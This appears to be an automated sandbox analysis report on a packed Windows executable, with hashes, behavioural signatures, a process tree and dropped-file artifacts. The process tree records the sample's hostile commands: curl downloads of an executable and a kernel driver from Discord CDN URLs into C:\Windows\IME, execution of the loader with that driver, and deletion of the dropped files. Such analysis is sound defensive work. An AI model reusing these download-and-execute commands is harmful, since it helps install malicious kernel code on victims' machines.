Analysis

  • max time kernel
    117s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    22/12/2023, 10:27

General

  • Target

    84dfe3e2c2c23431bf1016ea20d6c329.exe

  • Size

    5.4MB

  • MD5

    84dfe3e2c2c23431bf1016ea20d6c329

  • SHA1

    a550c42c27139a7b6342edefed46646847ef0e90

  • SHA256

    3b0cf0a25f13296540bfcc2e891958adc7c8c7aa799cf4cc1988d79299f6c1c4

  • SHA512

    6a08f161325481c5ef1242ab3707935cdb24f54ec0b992a1a5fb459bea1be49ab68f949b578f39c3c5b61b0c834f03e82477171a1aec2a02a86bb3839825fac4

  • SSDEEP

    98304:UFKcieVSvNTwVaUSCBsZgw2PJ2Q9tv9aiayBgfBY1CXpmzL7J/C7dep4mh:UDObUSCZwmJ2Ud9paICOkobUep4W

Score
7/10

Malware Config

Signatures

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe
    "C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Color C
      2⤵
        PID:2668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start https://discord.gg/7fhtVRZEC6
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2720
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" https://discord.gg/7fhtVRZEC6
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2992
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1636
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
        2⤵
          PID:2740
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
          2⤵
            PID:2688
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
            2⤵
              PID:2580
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
              2⤵
                PID:1520
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
                2⤵
                  PID:2076
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\Windows\Monke.exe C:\Windows\GigaByteTech.sys >nul 2>&1
                  2⤵
                    PID:2052

                Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        d32a1145fa24e278d5b879a253ceaf1b

                        SHA1

                        7fad5b4eda72e52568e5c35d736240880ff61573

                        SHA256

                        fbe19914ca42686b96b4a28efdc2aed8061cb39e6cca6206180556f5669013e9

                        SHA512

                        88a5f0c8202d5ffa241b7b00d820ad49be8830723b27059f031c6d9f5429bad5eedcbba546644ed30432df9e619e8beb0b97fd723420068c0a67491f622d1d3e

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        8dea5297d7eabe918bac7cecf7891382

                        SHA1

                        57775c9efa3da6f9f6a1c66243655d8642863359

                        SHA256

                        e729135d7adfdb71ce3953ab89c5aee83a7801a22bb49a25377bfc6050f5c167

                        SHA512

                        123c325c0264338f327e11f2fabc649032e1141ba9f0c37af10b7e31db65ab7ea61b2952d75c84abdbf43f694b7e5457353694caf0354064fc9448a825abc5be

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        083d06b1835da89231db9b894948b88a

                        SHA1

                        b423b1298c9ba7e2205d7bc437256ffdb4cfc58e

                        SHA256

                        0eda52a83ea05ca6fd4e49a82f49bff856b59bda8d4f0991c63ffe790f5ae6eb

                        SHA512

                        1f2f1436ccf61d2ddf10ee279ee5802188cb4827e18a6725d96404953351b6398104106abd0bdc397e5a1c84b16ea868e8dd18436b19d995dabb0acabed36530

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        56772c8baf249b1fc374fe3c3eed862b

                        SHA1

                        79eafe858479fb3e6fc1656b2997a76e76a4b104

                        SHA256

                        ac38a0c100b6491f27875fe460d41dfbe31e5880dc87fc071cfc00f72b75bd2d

                        SHA512

                        e9d0d5ca8f812649fb41a436d2649385f99bd95351b807ae6bb711ed79cabb579b9ff6b8f20c7d4280a83bee5ed5b0582240c73ea20bed9ca870e817e192c0fe

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        0c4e04e7eb975d25ae2fd723bd9d0211

                        SHA1

                        576c83769f560a738e7f29d3686cb8cb505b6d49

                        SHA256

                        42b740597a693b112b33a0baaa768f5e99fef8b10af542077ed3699554cc0619

                        SHA512

                        28b372079a1ea00e136419974970f027a81e497c0441c995a1b40607df4c6e6217dbba32d946f73b437a3fa2999cf38c82344d2b42db48943e258071b45c7d59

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        a531d6c5abe413f63819c0ca1dbeeb64

                        SHA1

                        e56f0b975c10700d18a47935281ebf8c4112ee74

                        SHA256

                        f2d30a99f1849894053e1ad2b562dd93b2090912e3dda94604b57d32ea5ae15d

                        SHA512

                        1dddb37c810c6238114e49ccff241468524d9dfdc4c2d5129a2990c1978cf6576c33e9fa2cd12602d76f632400852952b19a177768d2fb8a28744b19e8d49954

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        bf6c4591251babaf17a09f05af4fdbaf

                        SHA1

                        02b5993293fa2b116e5e04c318e0397985dcfb42

                        SHA256

                        481753b4d04fba059b38a73bc5981f0249d38f41eb7f4c6959e17b92d27665df

                        SHA512

                        8b79baa029f2dc58d38b4be6e71d464405ca1e2ca42387ec71840a2214fda6dba91b3c538a696905b12f44dbbc79d454e47dbb786dedc235b3d136bf084a2453

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        fb79b0c6031801495ec88c53591873c8

                        SHA1

                        6da8d4be344df080f369b673d8dc531038e748fb

                        SHA256

                        40df25f6cd9b62f61422770cf9398a56694b55b3578b9a1f383e58be2d1828e4

                        SHA512

                        4548c39f3934152c8b0065d1e498badc4b80dc8ea80d3e55be0d6e35fd48bfb2426d9156ac9c8217d44c1fd74a2682b4fc92964683441bcfcb96937cdc501331

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        bc7582e7c5ae1f6fba217bc3cf8f79e6

                        SHA1

                        e5ade1e265369a23a8f03f5f77cd1e6040ca23b8

                        SHA256

                        c0b0ca00303aa9fd01770644db131aceaa39b764da2127f6ef95578c61f8f46e

                        SHA512

                        3d82d50511eb4ccad7a19600999764985df77a777da02f1557285424632bd24248614e0d8ac3a7aa1eb480da290fea60bf73a7f393d34c7fb46359e6997ab6dc

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        a838aa441ec111781dd602eccdf285a3

                        SHA1

                        8c4cca2ed8ad2d27fc5b25182e10f6c1997bb0e9

                        SHA256

                        3332bdf808b6654a3f9f6f70ac3e73315f513b931d92c775230429da02167b68

                        SHA512

                        945c32bebbb03ff631537247cb2714336f662c139db60d99856c2345f26e7157e4f74b3037e7ce661863b79a28481f6ac263f6ee1e22d0f609ab402ca0263d36

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        70bf6a1197fbe7c474e07f16edeb7aed

                        SHA1

                        c81ab279a9136e578331082bc0e2d8e128dce01a

                        SHA256

                        48111d52ebf0dd03a893d92d6669c36232028eb81fa96ee1a2e80a3841122c84

                        SHA512

                        de2478e7d5dad55edc81f834be457e89d52310015c6e408cfbf2f7961346e78aa58f29df41a87131d8bae111303eed3c692def73a7d2dd672a25c4b934b21200

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        2b78d4344c880e31eb612c356d516cab

                        SHA1

                        1739acdcc32d9c033620a2e68361396cd50512b3

                        SHA256

                        7cef8cb87fc2f18150fe3de915b7eb2106dde2f79f8c4809ea0fe1993d3700b6

                        SHA512

                        a355c8dd11e57361bb6dfbbce0b450a6e8b1d4f306e106ae08391472e9f5f5b0368fd43db4d536e05a0956f7d8a32bb692efa394763c91de600794540cf663e9

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        6af8a20603ba345c39db33c665b7cee7

                        SHA1

                        ffaa471abe8b1c0aa1227d0be8b415e29b3f8f61

                        SHA256

                        4597f49784f58d7495362702280a906242af5d7a0c7c7a28ea208772ff7b3b38

                        SHA512

                        a39bf9dd247973844372d7512f685a6662745416ec0f3ec4432ed81aebffde2507a75d3c7f17649c70028d6b30c432b733d255aa56706411f8ea5de76003f36f

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        40b4b1762c66bdba356c11f643e4fcc0

                        SHA1

                        325b643d63117cd147a2ac4b41639ca673def7fe

                        SHA256

                        dd274fa908e1aa7c334d642504de653d69e102fe04a07e3907615cb8a40724e0

                        SHA512

                        dc692c8ef51547aa25d578223ae798c4349cae6208630450a6da4d5834d7d3947293620982821b0ef7e02bd7b4c4004d31f11facfd9a3564a385133eb9812452

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        6ed7ce9cf4736b39cf2c798d9c277f94

                        SHA1

                        a0cbd403e798451ce5aa004c92966a1c2ff551a8

                        SHA256

                        4e922dd1d8926adf719fb33586578736f3049bb8d4e613b66e4c39bb2d5f4a34

                        SHA512

                        6e46157c8124324fcb88df04947c89784142afe3e5eb1d97853f5478e4850efa40fb7d68ad66ac0563899919f9b571f44f68db1a11fb8753590b68dc7da1f269

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        c531922e68b5732f7e4cff3c346afd1b

                        SHA1

                        0284ed565f234f43ee14276720d0f13555866422

                        SHA256

                        440009c51f99b16af1be2e7f6b038e21193794d8f151cedf9116692ff47cfa1f

                        SHA512

                        884dbc1c28acac51282a61bc39e5948cdf5b132dfa721edc68e58d582d9e5383575110fb81692655b933c0548acc3dcdc881406abc3fd6132db6e1b7e43d0fca

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                        Filesize

                        344B

                        MD5

                        e96a82ad354158cf3fbc1841e7ec450e

                        SHA1

                        8cc0022a4914cda1ebccd04fd9b34fc49c2cfacc

                        SHA256

                        47c6f28ce09bbe7fcae3fcfe79f4acee02093350a2aec5741bc035855fd7a854

                        SHA512

                        c89836f78e8bae31b08a017cffa0d47a37e5689eb985f5c2ccfdba0d7a3b6d34275fd4550e40e4f9f70c8db96405bd1023df097ff89f47958cddc2f8b06ac6ab

                      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\d151rer\imagestore.dat

                        Filesize

                        24KB

                        MD5

                        f23309bb5938b31f8df75c4023711cc4

                        SHA1

                        47d31f46c196841a7dfb6a0fe6ea1fa7de2c8677

                        SHA256

                        5e8aa83d7ba1f7ceb1fa5f8cd09fd750f6dcf75e209a66508adf103784fd1b0b

                        SHA512

                        fa7c6145dfa6591f7376ce5ad51415ff64375120eb606c423d94eaf4ea492b2c66fd48e6050fcd400c6b9043b130ab0cea6a915fab1702f0bf84ebc49c5bd8f0

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6MCRSFJ\favicon[1].ico

                        Filesize

                        23KB

                        MD5

                        ec2c34cadd4b5f4594415127380a85e6

                        SHA1

                        e7e129270da0153510ef04a148d08702b980b679

                        SHA256

                        128e20b3b15c65dd470cb9d0dc8fe10e2ff9f72fac99ee621b01a391ef6b81c7

                        SHA512

                        c1997779ff5d0f74a7fbb359606dab83439c143fbdb52025495bdc3a7cb87188085eaf12cc434cbf63b3f8da5417c8a03f2e64f751c0a63508e4412ea4e7425c

                      • C:\Users\Admin\AppData\Local\Temp\Cab8E7C.tmp

                        Filesize

                        65KB

                        MD5

                        ac05d27423a85adc1622c714f2cb6184

                        SHA1

                        b0fe2b1abddb97837ea0195be70ab2ff14d43198

                        SHA256

                        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                        SHA512

                        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                      • C:\Users\Admin\AppData\Local\Temp\Tar9062.tmp

                        Filesize

                        171KB

                        MD5

                        9c0c641c06238516f27941aa1166d427

                        SHA1

                        64cd549fb8cf014fcd9312aa7a5b023847b6c977

                        SHA256

                        4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

                        SHA512

                        936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

                      • memory/1200-418-0x000000013FD10000-0x0000000140669000-memory.dmp

                        Filesize

                        9.3MB

                      • memory/1200-0-0x0000000077970000-0x0000000077972000-memory.dmp

                        Filesize

                        8KB

                      • memory/1200-6-0x000000013FD10000-0x0000000140669000-memory.dmp

                        Filesize

                        9.3MB

                      • memory/1200-421-0x00000000777C0000-0x0000000077969000-memory.dmp

                        Filesize

                        1.7MB

                      • memory/1200-7-0x00000000777C0000-0x0000000077969000-memory.dmp

                        Filesize

                        1.7MB

                      • memory/1200-5-0x0000000077970000-0x0000000077972000-memory.dmp

                        Filesize

                        8KB

                      • memory/1200-3-0x0000000077970000-0x0000000077972000-memory.dmp

                        Filesize

                        8KB

                      • memory/1200-2-0x000000013FD10000-0x0000000140669000-memory.dmp

                        Filesize

                        9.3MB